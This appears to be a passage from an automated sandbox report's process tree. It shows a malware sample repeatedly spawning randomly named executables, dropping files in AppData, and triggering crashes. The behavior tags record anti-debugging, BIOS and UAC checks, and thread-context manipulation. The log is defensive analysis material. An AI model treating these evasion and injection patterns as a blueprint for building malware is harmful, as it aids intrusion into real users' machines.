C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:4748
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:8540
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:3200
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9324
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:4712
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:4024
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:6428
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10488
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10988
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10256
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:4208
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:8868
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:3668
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9788 -s 284⤵
- Program crash
PID:9344
-
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:6604
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7816
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:3532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 284⤵
- Program crash
PID:8344
-
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:680
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9436
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:8464
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:8408
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10096
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10200
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7072
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7432
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7856
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:3940
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9760
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7344
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:3244
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:2612
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7388
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10252
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10964
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9108
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7332
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10940
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9052 -s 284⤵
- Program crash
PID:9460
-
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7172
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:6788
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:4740
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:11016
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:3332
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9728
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:1580
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:8596
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9048
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:6496
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:8016
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10488
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:6688
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:1536
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10036
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9920
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7084
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7128
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10976
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:1532
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:1336
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7260
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10856
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:1892
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7536
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7224
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:72
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:12068
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:12660
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:12052
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:12732
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:12792
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:6220
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:12940
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7988
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:12300
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7864
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:11140
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:7868
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:13740
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:14296
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:13768
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:5936
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:14168
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:14020
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:14116
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:13520
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9236 -s 284⤵
- Program crash
PID:14128
-
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:1628
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:14008
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:8608
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:4952
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:14156
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:5188
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9592
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:12916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12916 -s 284⤵
- Program crash
PID:4048
-
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:14316
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:13124
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:12504
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:11060
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:11752
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:12916
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:10936
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:9356
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:12312
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:6392
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:14508
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:15244
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:15156
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:15312
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:14868
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:13900
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:11448
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:14768
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:15612
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:15456
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:16212
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:1188
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:14452
-
-
C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exeC:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe3⤵PID:15644
-
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe"C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1156 -
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Executes dropped EXE
PID:1644
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Executes dropped EXE
PID:4984
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Executes dropped EXE
PID:4824
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Executes dropped EXE
PID:5792
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Executes dropped EXE
PID:5584
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Executes dropped EXE
PID:5960
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Executes dropped EXE
PID:2780
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5380
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5468
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:4316
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:3716
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:6400
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7040
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:3128
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:6868
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:3868
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5164
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7736
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:7920
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8824
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8844
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8268
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8140
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:3188
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8200
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9884
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:9672
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8684
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5868
-
C:\Users\Admin\AppData\Roaming\2046374.exe"C:\Users\Admin\AppData\Roaming\2046374.exe"4⤵PID:8624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8624 -s 24245⤵
- Program crash
PID:7128
-
-
-
C:\Users\Admin\AppData\Roaming\7367918.exe"C:\Users\Admin\AppData\Roaming\7367918.exe"4⤵
- Loads dropped DLL
PID:7560
-
-
C:\Users\Admin\AppData\Roaming\1172959.exe"C:\Users\Admin\AppData\Roaming\1172959.exe"4⤵PID:6668
-
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:8416
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:5832
-
-
C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exeC:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe3⤵PID:1908
-
-
